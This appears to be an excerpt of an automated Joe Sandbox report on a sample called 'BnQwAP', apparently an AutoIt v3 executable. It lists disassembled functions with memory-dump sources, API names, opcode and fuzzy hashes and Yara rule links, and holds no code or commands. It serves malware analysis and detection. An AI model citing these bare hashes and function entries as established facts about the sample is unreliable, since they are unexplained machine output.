                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                                    • Instruction ID: c1c8a572f185da1a28f659334ff27532645ded62cb21b73ac16749e52a08bfd5
                                                                                                                    • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                                    • Instruction Fuzzy Hash: 90113A26B19A4585EB459F26E2803B96360EB84FE4F586132DE1E973A1CF3ED4E4C700
                                                                                                                    Function 00007FF656020414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                                    • Instruction ID: fb47867a398746808f97ae6aacd6bd2f7d8dc1aaf90110d94ccfc8206d639894
                                                                                                                    • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                                    • Instruction Fuzzy Hash: 2F11C6B2A0C74686EB059F50DA502AE7761FF90354F988132E64F5A3D6CFBDE008CB00
                                                                                                                    Function 00007FF6560148EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                                    • Instruction ID: ccdd742f004e148c735fd325b4c40a0e26b6f8e95650721ca22099a09264ff60
                                                                                                                    • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                                    • Instruction Fuzzy Hash: E8018421E0860741FE65AA659F2137912519F9577CF2C0331E92DEA2D2CE7EE44AC300
                                                                                                                    Function 00007FF656014970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                                    • Instruction ID: 0e98485df9220b29d8041b5ee23d8dd4ce0ac17132722d33efb3cf8516b5c25c
                                                                                                                    • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                                    • Instruction Fuzzy Hash: AEF0B421A4C20382EA546BA5BF5117D2294DF40768F2C5230E95EE62E6CE7EE44AC711
                                                                                                                    Function 00007FF655FE652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF656014970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656014999
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF65602C8FE), ref: 00007FF655FE656F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3938577545-0
                                                                                                                    • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                                    • Instruction ID: 68a949e1c76f18d9a15227105600c1b80cf8b3ff3ff31dc3ad94a038ba4714e2
                                                                                                                    • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                                    • Instruction Fuzzy Hash: 16F03A56B09B0A82EF59CF75E0693382360AB58F0CF180531CA1E9B189CF2CD859C641
                                                                                                                    Function 00007FF656004C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF656004C5C
                                                                                                                      • Part of subcall function 00007FF656005600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656005609
                                                                                                                      • Part of subcall function 00007FF656005600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF65600561A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1680350287-0
                                                                                                                    • Opcode ID: ad801c2c3584bf2bf8cc338021b3875574537b688fb6d0f9b5ce0c86e08b9346
                                                                                                                    • Instruction ID: 4eec7c6cc452e99a8c1378c5737c601ced42e595a1e6698d85e71cb60416231d
                                                                                                                    • Opcode Fuzzy Hash: ad801c2c3584bf2bf8cc338021b3875574537b688fb6d0f9b5ce0c86e08b9346
                                                                                                                    • Instruction Fuzzy Hash: 86E0B650E1950785FDE96D61575697901400F59371EEC2F30D93DE62C2AD1EA49DC118
                                                                                                                    Function 00007FF65605B334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                                    • Instruction ID: 85cf6a4f14a56437ff5c17c001be62be02c567dd27940fc983f06dd3621b019a
                                                                                                                    • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                                    • Instruction Fuzzy Hash: 98E03922608A9182D720CB16F54032AE370FB8ABC8F584525EF8C57B19CF7DD555CB84
                                                                                                                    Function 00007FF655FE3EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 82841172-0
                                                                                                                    • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                                    • Instruction ID: fbab85b3bf5b4a350e28e484d8469e695f6dcb0f758c4f1706ccebc6de6abd28
                                                                                                                    • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                                    • Instruction Fuzzy Hash: 43E0D822B0878281D761972AE64439963A6FF8CBC8F084031EE8C83B5ACD6CC589CB00
                                                                                                                    Function 00007FF655FE5D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                                    • Instruction ID: 9d6b3dc55eefd815384ef2ce5da2b208d2a2763ac3d1440e221f81f8b661bef9
                                                                                                                    • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                                    • Instruction Fuzzy Hash: 7DF0826191DB8287F3619F55E40436A76A5F78430CF880135D28D97395CE3DD309CF00
                                                                                                                    Function 00007FF655FE1080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3030063568-0
                                                                                                                    • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                                    • Instruction ID: c4e46c12ccb2b4374a2f46ef0fb1583553c15886020c42796b820d9b056f3a0d
                                                                                                                    • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                                    • Instruction Fuzzy Hash: 4CE0C260F1A68BC0EF04BF69EA8517A23A0AF91305FC85736C40DE3352EE1DD299C700
                                                                                                                    Function 00007FF655FE1048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                                    • Instruction ID: cc3cfa9ae313ba6852ee57883bb3a91ef19da4657abe516253e5f70fa93442d9
                                                                                                                    • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                                    • Instruction Fuzzy Hash: 78C01210E5A08BC0E94877B68D8607401904FA9310FD80B76C10DD1282DD1D51EE8B45
                                                                                                                    Function 00007FF655FE1064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                                    • Instruction ID: 537ae77da3d729a01980b67aabc503538c8a37a86e36218be6985817e880acbe
                                                                                                                    • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                                    • Instruction Fuzzy Hash: EAC01215E6A08BC0E54877B68D8607801904FA5710FDC0375C00DD1282DD1D51EA8A15
                                                                                                                    Function 00007FF655FE10E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2932345936-0
                                                                                                                    • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                                    • Instruction ID: 1a0e872c15998485b0e3c6526efe43f3ababdc588a68455b2a067fa5469a9821
                                                                                                                    • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                                    • Instruction Fuzzy Hash: DDC01210E6908BC0E6087BB68D860B401904FA5310FD80336D10DD0282DD0D51EE8615
                                                                                                                    Function 00007FF656067E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                                    • Instruction ID: 1d7c80958b884d62f8010a4a8a9a7ee7d39820a4bb45045d067c86c1949a7461
                                                                                                                    • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                                    • Instruction Fuzzy Hash: A2716C26B04A4285EB90EF65D1943FD3360FB44B88F484532DE4DA77A6DF39E889C750
                                                                                                                    Function 00007FF65601C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4292702814-0
                                                                                                                    • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                    • Instruction ID: fe4ce7fa87c288104028afd458285f160b4f6a991940091b1d7534d77564e9cb
                                                                                                                    • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                                    • Instruction Fuzzy Hash: A5F0F851B0D24785FF659BA25E1127951915F88BB8F8C5630D82EEA2C2EE7EE488C610

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF6560756A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                    • Instruction ID: ee58a7d2943d06396554588cb10ffd508f306ee5fa261ec1d29d75882f40779c
                                                                                                                    • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                    • Instruction Fuzzy Hash: 8A22C336A087828BE710CF26E95456D77A1FB88B98F584235DE4E97B64CF3DD449CB00
                                                                                                                    Function 00007FF6560917C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
